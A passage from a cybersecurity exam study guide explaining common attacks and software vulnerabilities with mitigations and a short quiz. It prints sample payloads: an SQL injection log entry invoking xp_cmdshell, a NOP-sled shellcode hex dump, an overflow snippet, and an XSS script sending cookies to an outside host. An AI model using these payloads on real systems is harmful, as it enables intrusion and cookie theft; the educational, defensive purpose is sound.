Table 7-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 7-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Attack Types
1, 2
Vulnerabilities
3, 4
1. Which of the following is a good solution when disparate
applications that use their own authorization logic are in use
in the enterprise?
1. XML
2. XACML
3. PDP
4. PEP
2. Which of the following attacks can result in reading
sensitive data from the database, modifying database data,
and executing administrative operations on the database?
1. SQL injection
2. STUXNET
3. Integer overflow
4. TAXII
3. Which of the following has taken place when a pointer with
a value of NULL is used as though it pointed to a valid
memory area?
1. Insecure object reference
2. Improper error handing
3. Dereferencing
4. Advanced persistent threats
4. Which of the following is a type of race condition?
1. Time-of-check/time-of-use
2. NOP sled
3. Dereferencing
4. Overflow
FOUNDATION TOPICS
ATTACK TYPES
In this section we are going to look at the sort of things that
keep network and software security experts up at night. We’ll
look at specific network and software attack methods that you
must understand to be able defend against them. Then in the
following section, we’ll talk about vulnerabilities, which are
characteristics of the network and software environment in
which we operate.
Extensible Markup Language (XML) Attack
Extensible Markup Language (XML) is the most widely used
web language now and has come under some criticism. The
method currently used to sign data to verify its authenticity has
been described as inadequate by some critics, and the other
criticisms have been directed at the architecture of XML
security in general.
One type of Extensible Markup Language (XML) attack
targets the application that parses or reads and interprets the
XML. If the XML input contains a reference to an external
entity and is processed by a weakly configured XML parser, it
can lead to the disclosure of confidential data, denial of service,
server-side request forgery, and port scanning. This is called an
XML external entity attack and is depicted in Figure 7-1.
To address XML-based attacks, eXtensible Access Control
Markup Language (XACML) has been developed as a
standard for an access control policy language using XML. Its
goal is to create an attribute-based access control (ABAC)
system that decouples the access decision from the application
or the local machine. It provides for fine-grained control of
activities based on the following criteria:
Attributes of the user requesting access (for example, all division
managers in London)
The protocol over which the request is made (for example, HTTPS)
The authentication mechanism (for example, requester must be
authenticated with a certificate)
FIGURE 7-1 XML External Entity Attack
XACML uses several distributed components, including
Policy enforcement point (PEP): This entity protects the
resource that the subject (a user or an application) is attempting to
access. When a PEP receives a request from a subject, it creates an
XACML request based on the attributes of the subject, the
requested action, the resource, and other information.
Policy decision point (PDP): This entity retrieves all applicable
polices in XACML and compares the request with the policies. It
transmits an answer (access or no access) back to the PEP.
XACML is valuable because it is able to function across
application types. Figure 7-2 illustrates the process flow used by
XACML.
XACML is a good solution when disparate applications that use
their own authorization logic are in use in the enterprise. By
leveraging XACML, developers can remove authorization logic
from an application and centrally manage access using policies
that can be managed or modified based on business need
without making any additional changes to the applications
themselves.
FIGURE 7-2 XACML Flow
Structured Query Language (SQL) Injection
A Structured Query Language (SQL) injection attack
inserts, or “injects,” a SQL query as the input data from the
client to the application. This type of attack can result in the
attacker being able to read sensitive data from the database,
modify database data, execute administrative operations on the
database, recover the content of a given file, and even issue
commands to the operating system.
Figure 7-3 shows how a regular user might request information
from a database attached to a web server and also how a hacker
might ask for the same information and get usernames and
passwords by changing the command. While not obvious from
the diagram in Figure 7-3, the attack is prevented by the
security rules in the form of input validation, which examines
all input for malicious characteristics.
The job of identifying SQL injection attacks in logs can be made
easier by using commercial tools such as Log Parser by
Microsoft. This command-line utility, which uses SQL-like
commands, can be used to search and locate errors of a specific
type. One type to look for is a 500 error (internal server error),
which often indicates a SQL injection. Example 7-1 shows an
example of a log entry. In this case, the presence of a CREATE
TABLE statement indicates a SQL injection.
FIGURE 7-3 SQL Injection
Example 7-1 Log Entry with SQL Injection Attack
Click here to view code image
GET /inventory/Scripts/ProductList.asp
showdetails=true&idSuper=0&browser=pt%showprods&Type=588
idCategory=60&idProduct=66;CREATE%20TABLE%20[X_6624]
([id]%20int%20
NOT%20NULL%20
IDENTITY%20
(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL;
Insert%20into&20[X_6858] (ResultTxt)
%20exec%20master.dbo.xp_
cmdshell11%20'Dir%20D: \';
Insert%20into&20[X_6858]%20values%20('g_over');
exec%20master.dbo.sp_dropextendedeproc%20'xp_cmdshell'
300
The following measures can help you prevent these types of
attacks:
Use proper input validation.
Use blacklisting or whitelisting of special characters.
Use parameterized queries in ASP.NET and prepared statements in
Java to perform escaping of dangerous characters before the SQL
statement is passed to the database.
Overflow Attacks
An overflow occurs when an area of memory of some sort is full
and can hold no more information. Any information that
overflows is lost. Overflowing these memory areas is one of the
ways hackers get systems to perform operations they aren’t
supposed to perform (at least not at that time or under those
circumstances). In some cases these overflows are caused to
permit typically impermissible actions. There are a number of
different types of overflow attacks. They differ mainly in the
type of memory under attack.
Buffer
A buffer is typically an area of memory that is used to transfer
data from one location to another. In some cases, a buffer is
used to hold data from the disk while data-manipulating
operations are performed. A buffer overflow is an attack that
occurs when the amount of data that is submitted is larger than
the buffer can handle. Typically, this type of attack is possible
because of poorly written application or operating system code.
This can result in an injection of malicious code, primarily
either a denial-of-service (DoS) attack or a SQL injection.
To protect against this issue, organizations should ensure that
all operating systems and applications are updated with the
latest updates, service packs, and patches. In addition,
programmers should properly test all applications to check for
overflow conditions.
A hacker can take advantage of this phenomenon by submitting
too much data, which can cause an error or, in some cases,
enable the hacker to execute commands on the device if the
hacker can locate an area where commands can be executed.
Not all attacks are designed to execute commands. An attack
may just lock up the system, as in a DoS attack.
A packet containing a long string of no-operation (NOP)
instructions followed by a command usually indicates a type of
buffer overflow attack called a NOP slide. The purpose of this
type of attack is to get the CPU to locate where a command can
be executed. Example 7-2 shows a packet containing a long
string of NOP instructions, as seen by a sniffer.
Example 7-2 Packet with NOP Slide, As Seen by a Sniffer
Click here to view code image
TCP Connection Request
---- 14/03/2019 15:40:57.910
68.144.193.124 : 4560 TCP Connected ID = 1
---- 14/03/2014 15:40:57.910
Status Code: 0 OK
68.144.193.124 : 4560 TCP Data In Length
MD5 = 19323C2EA6F5FCEE2382690100455C17
---- 14/03/2004 15:40:57.920
0000 90 90 90 90 90 90 90 90 90 90 90 90
................
0010 90 90 90 90 90 90 90 90 90 90 90 90
................
0020 90 90 90 90 90 90 90 90 90 90 90 90
................
0030 90 90 90 90 90 90 90 90 90 90 90 90
................
0040 90 90 90 90 90 90 90 90 90 90 90 90
................
0050 90 90 90 90 90 90 90 90 90 90 90 90
................
0060 90 90 90 90 90 90 90 90 90 90 90 90
................
0070 90 90 90 90 90 90 90 90 90 90 90 90
................
0080 90 90 90 90 90 90 90 90 90 90 90 90
................
0090 90 90 90 90 90 90 90 90 90 90 90 90
................
00A0 90 90 90 90 90 90 90 90 90 90 90 90
................
00B0 90 90 90 90 90 90 90 90 90 90 90 90
................
00C0 90 90 90 90 90 90 90 90 90 90 90 90
................
00D0 90 90 90 90 90 90 90 90 90 90 90 90
................
00E0 90 90 90 90 90 90 90 90 90 90 90 90
................
00F0 90 90 90 90 90 90 90 90 90 90 90 90
................
0100 90 90 90 90 90 90 90 90 90 90 90 90
............M?.w
0110 90 90 90 90 FF 63 64 90 90 90 90 90
.....cd.........
0120 90 90 90 90 90 90 90 90 90 90 90 90
................
0130 90 90 90 90 90 90 90 90 EB 10 5A 4A
..........ZJ3.f.
0140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB
f..4...........p
0150 99 98 99 99 C3 21 95 69 64 E6 12 99
.....!.id......4
0160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF
697 bytes
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
4D 3F E3 77
90 90 90 90
90 90 90 90
33 C9 66 B9
FF FF FF 70
12 E9 85 34
E1 9A 6A 12
....A....j....j.
0170 E7 B9 9A 62
...b....t......b
0180 12 6B F3 97
.k...j?.....^..{
0190 70 C0 C6 C7
p....T....ZHx.X.
01A0 50 FF 12 91
P.......ZXx..X..
01B0 9A 5A 12 63
.Z.c.n._..I...q.
01C0 99 99 99 1A
...._...f.e..A..
01D0 C0 71 F0 99
.q............f.
01E0 69 12 41 5E
i.A^....$.Y.....
01F0 CE CA 66 CE
..f.m...f.a...f.
0200 65 1A 75 DD
e.u..m.B......{b
0210 10 DF A1 10
.........^......
0220 14 DE 89 C9
............^...
0230 F4 FD 99 14
........f.}.f.q.
0240 59 35 1C 59
Y5.Y.`....fK..2{
0250 77 AA 59 5A
w.YZqbgff.......
0260 D8 FD FD EB
................
0270 F6 FA FC EA
................
0280 EA EA 99 D5
................
0290 EE EA AB C6
................
02A0 D8 99 FB F0
................
12 D7 8D AA 74 CF CE C8 12 A6 9A 62
C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B
12 54 12 DF BD 9A 5A 48 78 9A 58 AA
12 DF 85 9A 5A 58 78 9B 9A 58 12 99
12 6E 1A 5F 97 12 49 F3 9A C0 71 E5
5F 94 CB CF 66 CE 65 C3 12 41 F3 9D
99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE
9E 9B 99 9E 24 AA 59 10 DE 9D F3 89
6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE
12 6D AA 42 F3 89 C0 10 85 17 7B 62
DF A5 10 DF D9 5E DF B5 98 98 99 99
CF CA CA CA F3 98 CA CA 5E DE A5 FA
DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA
EC 60 C8 CB CF CA 66 4B C3 C0 32 7B
71 62 67 66 66 DE FC ED C9 EB F6 FA
FC EA EA 99 DA EB FC F8 ED FC C9 EB
EA D8 99 DC E1 F0 ED C9 EB F6 FA FC
F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99
AA AB 99 CE CA D8 CA F6 FA F2 FC ED
F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA
Notice the long string of 90s in the middle of the packet; this
string pads the packet and causes it to overrun the buffer.
Example 7-3 shows another buffer overflow attack.
Example 7-3 Buffer Overflow Attack
Click here to view code image
#include
char *code = "AAAABBBBCCCCDDD"; //including the
character '\0' size =
16 bytes
void main()
{char buf[8];
strcpy(buf,code);
In this example, 16 characters are being sent to a buffer that
holds only 8 bytes. With proper input validation, a buffer
overflow attack causes an access violation. Without proper input
validation, the allocated space is exceeded, and the data at the
bottom of the memory stack is overwritten. The key to
preventing many buffer overflow attacks is input validation, in
which any input is checked for format and length before it is
used. Buffer overflows and boundary errors (when input
exceeds the boundaries allotted for the input) are a family of
error conditions called input validation errors.
Integer Overflow
Integer overflow occurs when math operations try to create a
numeric value that is too large for the available space. The
register width of a processor determines the range of values that
can be represented. Moreover, a program may assume that a
variable always contains a positive value. If the variable has a
signed integer type, an overflow can cause its value to wrap and
become negative. This may lead to unintended behavior.
Similarly, subtracting from a small unsigned value may cause it
to wrap to a large positive value, which may also be an
unexpected behavior.
You can mitigate integer overflow attacks by doing the
following:
Use strict input validation.
Use a language or compiler that performs automatic bounds checks.
Choose an integer type that contains all possible values of a
calculation. This reduces the need for integer type casting (changing
an entity of one data type into another), which is a major source of
defects.
Heap
A heap is an area of memory that can be increased or decreased
in size. This area of memory sits between the memory-mapped
region for shared libraries and the runtime heap. The area of
memory is used for dynamic memory allocation. Overflows that
occur in this area are called heap overflows. An example of
an overflow into the heap area is shown in Figure 7-4.
Figure 7-4 Heap Overflow
Remote Code Execution
Remote code execution attacks comprise a category of attack
types distinguished by the ability of the hacker to get the local
system (user system) to execute code that resides on another
machine, which could be located anywhere in the world. In
some cases the remote code has been embedded in a website the
user visits. In other cases the code may be injected into the
user’s browser. The key element is that the code came from the
hacker and is executed or injected from a remote location. A
specific form of this attack is shown in Figure 7-5, in which the
target is the local DNS server.
FIGURE 7-5 Remote Code Execution
Directory Traversal
Like any other server, web servers have a folder structure. When
users access web pages, the content is found in parts of the
structure that are the only parts designed to be accessible by a
web user. One of the ways malicious individuals are able to
access parts of the directory to which they should not have
access is through a process called directory traversal. If they
are able to break out of the web root folder, they can access
restricted directories and execute commands outside of the web
server’s root directory.
In Figure 7-6, the hacker has been able to access a subfolder of
the root, System32. This is where the password files are found.
This, if allowed by the system, is done by using the ../ technique
to back up from the root to the System32 folder.
Figure 7-6 Directory Traversal
Preventing directory traversal is accomplished by filtering the
user’s input and removing metacharacters.
Privilege Escalation
Privilege escalation is the process of exploiting a bug or
weakness in an operating system to allow a user to receive
privileges to which she is not entitled. These privileges can be
used to delete files, view private information, or install
unwanted programs, such as viruses. There are two types of
privilege escalation:
Vertical privilege escalation: This occurs when a lowerprivilege user or application accesses functions or content reserved
for higher-privilege users or applications.
Horizontal privilege escalation: This occurs when a normal
user accesses functions or content reserved for other normal users.
The following measures can help prevent privilege escalation:
Ensure that databases and related systems and applications are
operating with the minimum privileges necessary to function.
Verify that users are given the minimum access required to do their
job.
Ensure that databases do not run with root, administrator, or other
privileged account permissions, if possible.
Password Spraying
Password spraying is a technique used to identify the
passwords of domain users. Rather than targeting a single
account as in a brute-force attack, password spraying targets, or
“sprays,” multiple accounts with the same password attempt.
Because account lockouts are based on attempts per account,
this technique enables the attacker to attempt a password
against many accounts at once without locking out any of the
accounts. When performed in a controlled manner (meaning to
remain conscious of the time period since the last attempt
against an account and waiting until the timer starts over before
another attempt), an attacker can basically perform a bruteforce attack without locking out accounts. Figure 7-7 shows the
process.
Credential Stuffing
Another form of brute-force attack is credential stuffing. In
this case, the malicious individuals have obtained a password
file and need to match the passwords with the proper accounts.
Large numbers of captured ( spilled) credentials are
automatically entered into websites until they are potentially
matched to an existing account, which the attackers can then
hijack for their own purposes. This process is usually automated
in some way, as shown in Figure 7-8.
Figure 7-7 Password Spraying
Figure 7-8 Credential Stuffing
To prevent credential stuffing:
Implement multifactor authentication.
Regularly check compromised accounts lists and require password
resets for any users who appear on a list.
Require periodic password resets for all users.
Enable CAPTCHAs (challenge–response test to determine whether
or not the user is human).
Impersonation
Impersonation occurs when one user assumes the identity of
another by acquiring the logon credentials associated with the
account. This typically occurs through exposure of the
credentials either through social engineering (shoulder surfing,
help desk intimidation, etc.) or by sniffing unencrypted
credentials in transit. The best approach to preventing
impersonation is user education, because many of these attacks
rely on the user committing some insecure activity.
Man-in-the-Middle Attack
A man-in-the-middle attack intercepts legitimate traffic
between two entities. The attacker can then control information
flow and eliminate or alter the communication between the two
parties. Types of man-in-the-middle attacks include
ARP spoofing: The attacker poisons the ARP cache on a switch by
answering ARP requests for another computer’s IP address with his
own MAC address. After the ARP cache has been successfully
poisoned, when ARP resolution occurs, both computers have the
attacker’s MAC address listed as the MAC address that maps to the
other computer’s IP address. As a result, both are sending to the
attacker, placing him “in the middle.” Two mitigation techniques
are available for preventing ARP poisoning on a Cisco switch:
Dynamic ARP Inspection (DAI): This security feature
intercepts all ARP requests and responses and compares each
response’s MAC address and IP address information against the
MAC–IP bindings contained in a trusted binding table. This
table is built by also monitoring all DHCP requests for IP
addresses and maintaining the mapping of each resulting IP
address to a MAC address (which is a part of DHCP snooping). If
an incorrect mapping is attempted, the switch rejects the packet.
DHCP snooping: The main purpose of DHCP snooping is to
prevent a poisoning attack on the DHCP database. This is not a
switch attack per se, but one of its features can support DAI. It
creates a mapping of IP addresses to MAC addresses from a
trusted DHCP server that can be used in the validation process of
DAI.
You must implement both DAI and DHCP snooping because DAI
depends on DHCP snooping.
MAC overflow: Preventing security issues with switches involves
preventing MAC address overflow attacks. By design, switches place
each port in its own collision domain, which is why a sniffer
connected to a single port on a switch can only capture the traffic on
that port and not traffic on other ports. However, an attack called a
MAC address overflow attack can cause a switch to fill its MAC
address table with nonexistent MAC addresses. Using free tools, a
hacker can send thousands of nonexistent MAC addresses to the
switch. The switch can dedicate only a certain amount of memory
for the table, and at some point, it fills with the bogus MAC
addresses. This prevents valid devices from creating contentaddressable memory (CAM) entries (MAC addresses) in the MAC
address table. When this occurs, all legitimate traffic received by the
switch is flooded out every port. Remember that this is what
switches do when they don’t find a MAC address in the table. A
hacker can capture all the traffic. Figure 7-9 shows how this type of
attack works.
Figure 7-9 MAC Overflow Attack
VLAN-based Attacks
Enterprise-level switches are capable of creating virtual localarea networks (VLANs). These are logical subdivisions of a
switch that segregate ports from one another as if they were in
different LANs. VLANs can also span multiple switches,
meaning that devices connected to switches in different parts of
a network can be placed in the same VLAN, regardless of
physical location. A VLAN adds a layer of separation between
sensitive devices and the rest of the network. For example, if
only two devices should be able to connect to the HR server, the
two devices and the HR server could be placed in a VLAN
separate from the other VLANs. Traffic between VLANs can
occur only through a router. Routers can be used to implement
access control lists (ACLs) that control the traffic allowed
between VLANs. Table 7-2 lists the advantages and
disadvantages of deploying VLANs.
Table 7-2 Advantages and Disadvantages of VLANs
Advantages
Disadvantages
Flexibility: Removes
the requirement that
devices in the same
LAN (or, in this case,
VLAN) be in the same
location.
Managerial overhead is required
to secure VLANs.
Performance: Creating
smaller broadcast
domains (each VLAN is
a broadcast domain)
improves performance.
Misconfigurations can isolate
devices.
Security: Provides more
separation at Layers 2
and 3.
The limit on number of VLANs
may cause issues on a very large
network.
Cost: Switched
networks with VLANs
are less costly than
routed networks
because routers cost
more than switches.
Subnet-based VLANs may expose
traffic to potential sniffing and
man-in-the-middle attacks when
traffic goes through third-party
ATM clouds or the Internet.
As you can see, the benefits of deploying VLANs far outweigh
the disadvantages, but there are some VLAN attacks of which
you should be aware. In particular, you need to watch out for
VLAN hopping. By default, a switch port is an access port,
which means it can only be a member of a single VLAN. Ports
that are configured to carry the traffic of multiple VLANs, called
trunk ports, are used to carry traffic between switches and to
routers. An aim of a VLAN hopping attack is to receive traffic
from a VLAN of which the hacker’s port is not a member. It can
be done two ways:
Switch spoofing: Switch ports can be set to use a negotiation
protocol called Dynamic Trunking Protocol (DTP) to negotiate the
formation of a trunk link. If an access port is left configured to use
DTP, it is possible for a hacker to set his interface to spoof a switch
and use DTP to create a trunk link. If this occurs, the hacker can
capture traffic from all VLANs. Figure 7-10 shows this process. To
prevent this, you should disable DTP on all switch ports.
Figure 7-10 Switch Spoofing
A switch port can be configured with the following possible settings:
Trunk (hard-coded to be a trunk)
Access (hard-coded to be an access port)
Dynamic desirable (in which case the port is willing to form a
trunk and actively attempts to form a trunk)
Dynamic auto (in which case the port is willing to form a trunk
but does not initiate the process)
If a switch port is set to either dynamic desirable or dynamic auto, it
would be easy for a hacker to connect a switch to that port, set his
port to dynamic desirable, and thereby form a trunk. All switch
ports should be hard-coded to trunk or access, and DTP should not
be used. You can use the following command set to hard-code a port
on a Cisco router as a trunk port:
Click here to view code image
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode trunk
To hard-code a port as an access port that will never become a trunk
port, thus making it impervious to a switch spoofing attack, you use
this command set:
Click here to view code image
Switch(config)# interface FastEthernet 0/1
Switch(config-if)# switchport mode access
Double tagging: Tags are used on trunk links to identify the
VLAN to which each frame belongs. Another type of attack to trunk
ports is called VLAN hopping. It can be accomplished using a
process called double tagging. In this attack, the hacker creates a
packet with two tags. The first tag is stripped off by the trunk port of
the first switch it encounters, but the second tag remains, allowing
the frame to hop to another VLAN. This process is shown in Figure
7-11. In this example, the native VLAN number between the
Company Switch A and Company Switch B switches has been
changed from the default of 1 to 10.
FIGURE 7-11 Double Tagging
To prevent this, you do the following:
Specify the native VLAN (the default VLAN, or VLAN 1) as an
unused VLAN ID for all trunk ports by specifying a different VLAN
number for the native VLAN. Make sure it matches on both ends of
each link. To change the native VLAN from 1 to 99, execute this
command on the trunk interface:
Click here to view code image
switch(config-if)# switchport trunk native
vlan 99
Move all access ports out of VLAN 1. You can do this by using the
interface range command for every port on a 12-port switch as
follows:
Click here to view code image
switch(config)# interface-range
FastEthernet 0/1 – 12
switch(config-if)# switchport access vlan
61
This example places the access ports in VLAN 61.
Place unused ports in an unused VLAN. Use the same command
you used to place all ports in a new native VLAN and specify the
VLAN number.
Session Hijacking
In a session hijacking attack, the hacker attempts to place
himself in the middle of an active conversation between two
computers for the purpose of taking over the session of one of
the two computers, thus receiving all data sent to that
computer. A couple of tools can be used for this attack.
Juggernaut and the Hunt Project allow the attacker to spy on
the TCP session between the computers. Then the attacker uses
some sort of DoS attack to remove one of the two computers
from the network while spoofing the IP address of that
computer and replacing that computer in the conversation. This
results in the hacker receiving all traffic that was originally
intended for the computer that suffered the DoS attack. Figure
7-12 shows a session highjack.
FIGURE 7-12 Session Hijacking
Rootkit
A rootkit is a set of tools that a hacker can use on a computer
after he has managed to gain access and elevate his privileges to
administrator. It gets its name from the root account, the most
powerful account in Linux-based operating systems. Rootkit
tools might include a backdoor for the hacker to access. This is
one of the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely remove
it.
The following are some of the actions a rootkit can take:
Installing a backdoor
Removing all entries from the security log (log scrubbing)
Replacing default tools with a compromised version (Trojaned
programs)
Making malicious kernel changes
Unfortunately, the best defense against rootkits is to not to get
them in the first place because they are very difficult to detect
and remove. In many cases rootkit removal renders the system
useless. There are some steps you can take to prevent rootkits,
including the following:
Monitor system memory for ingress points for a process as it
invokes and keeps track of any imported library calls that may be
redirected to other functions.
Use the Microsoft Safety Scanner to look for information kept
hidden from the Windows API, the Master File Table, and the
directory index.
Consider products that are standalone rootkit detection tools, such
as Microsoft Safety Scanner and Malwarebytes Anti-Rootkit 2019.
Keep the firewall updated.
Harden all workstations.
Cross-Site Scripting
Cross-site scripting (XSS) occurs when an attacker locates a
website vulnerability and injects malicious code into the web
application. Many websites allow and even incorporate user
input into a web page to customize the web page. If a web
application does not properly validate this input, one of two
things could happen: the text may be rendered on the page, or a
script may be executed when others visit the web page. Figure 713 shows a high-level view of an XSS attack.
Figure 7-13 High-Level View of a Typical XSS Attack
The following example of an XSS attack is designed to steal a
cookie from an authenticated user:
Click here to view code image
<SCRIPT> document.location='http://site.comptia/cgibin/script.
cgi?'+document. cookie </SCRIPT>
Proper validation of all input should be performed to prevent
this type of attack. This involves identifying all user-supplied
input and testing all output.
There are three types of XSS attacks:
Reflected XSS
Persistent XSS
Document Object Model (DOM) XSS
Let’s look at how they differ.
Reflected
In a reflected XSS attack (also called a non-persistent or Type
II attack), a web application immediately returns user input in
an error message or search result without that data being made
safe to render in the browser, and without permanently storing
the user-provided data. Figure 7-14 shows an example of how a
reflected XSS attack works.
Figure 7-14 Reflected XSS Attack
Persistent
A persistent XSS attack (also called a stored or Type I attack)
stores the user input on the target server, such as in a database,
a message forum, a visitor log, a comment field, and so forth.
And then a victim is able to retrieve the stored data from the
web application without that data being made safe to render in
the browser. Figure 7-15 shows an example of a persistent XSS
attack.
FIGURE 7-15 Persistent XSS Attack
Document Object Model (DOM)
With a Document Object Model (DOM) XSS attack (or
Type 0 attack), the entire tainted data flow from source to sink
(a class or function designed to receive incoming events from
another object or function) takes place in the browser. The
source of the data is in the DOM, the sink is also in the DOM,
and the data flow never leaves the browser. Figure 7-16 shows
an example of this approach.
Figure 7-16 DOM-Based XSS Attack
VULNERABILITIES
Whereas attacks are actions carried out by malicious
individuals, vulnerabilities are characteristics of the network
and software environment in which we operate. This section
describes the various software vulnerabilities that a
cybersecurity analyst should be able to identify and remediate.
Improper Error Handling
Web applications, like all other applications, suffer from errors
and exceptions, and such problems are to be expected.
However, the manner in which an application reacts to errors
and exceptions determines whether security can be
compromised. One of the issues is that an error message may
reveal information about the system that a hacker may find
useful. For this reason, when applications are developed, all
error messages describing problems should be kept as generic
as possible. Also, you can use tools such as the OWASP Zed
Attack Proxy (ZAP, introduced in Chapter 4) to try to make
applications generate errors.
Dereferencing
A null-pointer dereference takes place when a pointer with a
value of NULL is used as though it pointed to a valid memory
area. In the following code, the assumption is that “cmd” has
been defined:
Click here to view code image
String cmd = System.getProperty("cmd");
cmd.trim();
cmd =
If it has not been defined, the program throws a null-pointer
exception when it attempts to call the trim() method. If an
attacker can intentionally trigger a null-pointer dereference, the
attacker might be able to use the resulting exception to bypass
security logic or to cause the application to reveal debugging
information.
Insecure Object Reference
Applications frequently use the actual name or key of an object
when generating web pages. Applications don’t always verify
that a user is authorized for the target object. This results in an
insecure object reference flaw. Such an attack on a
vulnerability can come from an authorized user, meaning that
the user has permission to use the application but is accessing
information to which she should not have access. To prevent
this problem, each direct object reference should undergo an
access check. Code review of the application with this specific
issue in mind is also recommended.
Race Condition
A race condition is a vulnerability that targets the normal
sequencing of functions. It is an attack in which the hacker
inserts himself between instructions, introduces changes, and
alters the order of execution of the instructions, thereby altering
the outcome. A type of race condition is time-of-check/time-ofuse vulnerability. In this attack, a system is changed between a
condition check and the display of the check’s results. For
example, consider the following scenario: At 10:00 a.m. a
hacker was able to obtain a valid authentication token that
allowed read/write access to the database. At 10:15 a.m. the
security administrator received alerts from the IDS about a
database administrator performing unusual transactions. At
10:25 a.m. the security administrator reset the database
administrator’s password. At 11:30 a.m. the security
administrator was still receiving alerts from the IDS about
unusual transactions from the same user. In this case, the
hacker created a race condition that disturbed the normal
process of authentication. The hacker remained logged in with
the old password and was still able to change data.
Countermeasures to these attacks are to make critical sets of
instructions either execute in order and in entirety or to roll
back or prevent the changes. It is also best for the system to lock
access to certain items it will access when carrying out these
sets of instructions.
Broken Authentication
When the authentication system is broken, it’s as if someone
has left the front door open. This can lead to a faster
compromise of vulnerabilities discussed in this section as well
as attacks covered in the previous section. Broken
authentication means that a malicious individual has either
guessed or stolen a password, enabling them to log in as the
user with all of the user’s rights. Typical methods are
Guessing a password
Cracking a captured password hash
Phishing attacks
Using social engineering such as shoulder surfing
Recall that Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” covered the CVSS scoring system for
vulnerabilities. As a review, the system uses a metric dedicated
to Privileges Required (Pr) to describe the authentication an
attacker would need to get through to exploit the vulnerability.
The metric has three possible values:
H: Stands for High and means the attacker requires privileges that
provide significant (that is, administrative) control over the
vulnerable component, allowing access to component-wide settings
and files.
L: Stands for Low and means the attacker requires privileges that
provide basic user capabilities that could normally affect only
settings and files owned by a user.
N: Stands for None and means that no authentication mechanisms
are in place to stop the exploit of the vulnerability.
Sensitive Data Exposure
Sensitive data in this context includes usernames, passwords,
encryption keys, and paths that applications need to function
but that would cause harm if discovered. Determining the
proper method of securing this information is critical and not
easy. In the case of passwords, a generally accepted rule is to
not hard-code passwords (although this was not always
standard practice). Instead, passwords should be protected
using encryption when they are included in application code.
This makes them difficult to change, reverse, or discover.
Storing this type of sensitive data in a configuration file also
presents problems. Such files are usually discoverable, and even
if they are hidden, they can be discovered by using a demo
version of the software if it is a standard or default location.
Whatever method you use, give significant thought to protecting
these sensitive forms of data. The following measures can help
you prevent disclosure of sensitive information from storage:
Ensure that memory locations where this data is stored are locked
memory.
Ensure that ACLs attached to sensitive data are properly
configured.
Implement an appropriate level of encryption.
Insecure Components
There are two types of components, physical and software. The
emphasis in this section is on software components. An insecure
software component is a set of code that performs a particular
function as a part of a larger system, but does so in a way that
creates vulnerabilities.
The U.S. Department of Homeland Security has estimated that
90% of software components are downloaded from code
repositories. These repositories hold code that can be reused.
Using these repositories speeds software development because
it eliminates the time it would take to create these components
from scratch. Organizations might have their own repository for
in-house code that has been developed.
In other cases, developers may make use of a third-party
repository in which the components are sold. Vulnerabilities
exist in much of the code found in third party repositories.
Many have been documented and disclosed as Common
Vulnerabilities and Exposures (CVEs). In many cases these
vulnerabilities have been addressed and updates have been
uploaded to the repository. The problem is that far too many
vulnerabilities have not been addressed, and even in cases
where they have, developers continue to use the vulnerable
components instead of downloading the new versions.
Developers who do rely on third-party repositories must also
keep track of the components’ updates and security profiles.
Code Reuse
Not all code reuse comes from a third party. In some cases,
organizations maintain an internal code repository. The
Financial Services Information Sharing and Analysis Center
(FS-ISAC), an industry forum for collaboration on critical
security threats facing the global financial services sector,
recommends the following measures to reduce the risk of
reusing components in general:
Developers must apply policy controls during the acquisition
process as the most proactive type of control for addressing the
security vulnerabilities in open-source libraries.
Manage risk by using controlled internal repositories to provision
open-source components and block the ability to download
components directly from the Internet.
Insufficient Logging and Monitoring
If the authentication system is broken, then the front door is
open. If there is insufficient logging and monitoring, you don’t
even know that someone came through the front door! One of
the challenges of staying on top of log review is the
overwhelming feeling that other “things” are more important.
Even when time is allotted in many cases, the sheer amount of
data to analyze is intimidating.
Audit reduction tools are preprocessors designed to reduce the
volume of audit records to facilitate manual review. Before a
security review, these tools can remove many audit records
known to have little security significance. These tools generally
remove records generated by specified classes of events, such as
records generated by nightly backups. Some technicians make
use of scripts for this purpose. One such Perl script called
swatch (the “Simple WATCHer”) is used by many Linux
technicians.
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement a security information and event management
(SIEM) system, which provides an automated solution for
analyzing events and deciding where the attention needs to be
given. In Chapter 11, “Analyzing Data As Part of Security
Monitoring Activities,” you will learn more about SIEM.
Weak or Default Configurations
A default configuration is one where the settings from the
factory have not been changed. This can allow for insecure
settings because many vendors adopt security settings that will
provide functionality in the largest number of scenarios.
Functionality and security are two completely different goals
and are not always compatible. Software settings should not be
left to the defaults and should be analyzed for the best
configuration for the scenario.
Misconfigurations are settings that depart from the defaults but
are still insecure. Some of the largest breaches have occurred
due to these “mistakes.” One of the ways to gain some control
over this process is to implement a configuration management
system.
Although it’s really a subset of change management,
configuration management specifically focuses itself on
bringing order out of the chaos that can occur when multiple
engineers and technicians have administrative access to the
computers and devices that make the network function. The
functions of configuration management are as follows:
Report the status of change processing.
Document the functional and physical characteristics of each
configuration item.
Perform information capture and version control.
Control changes to the configuration items, and issue versions of
configuration items from the software library.
Note
In the context of configuration management, a software library is a controlled
area accessible only to approved users who are restricted to the use of an
approved procedure. A configuration item (CI) is a uniquely identifiable subset of
the system that represents the smallest portion to be subject to an independent
configuration control procedure. When an operation is broken into individual CIs,
the process is called configuration identification.
Examples of these types of changes are as follows:
Operating system configuration
Software configuration
Hardware configuration
The biggest contribution of configuration management controls
is ensuring that changes to the system do not unintentionally
diminish security. Because of this, all changes must be
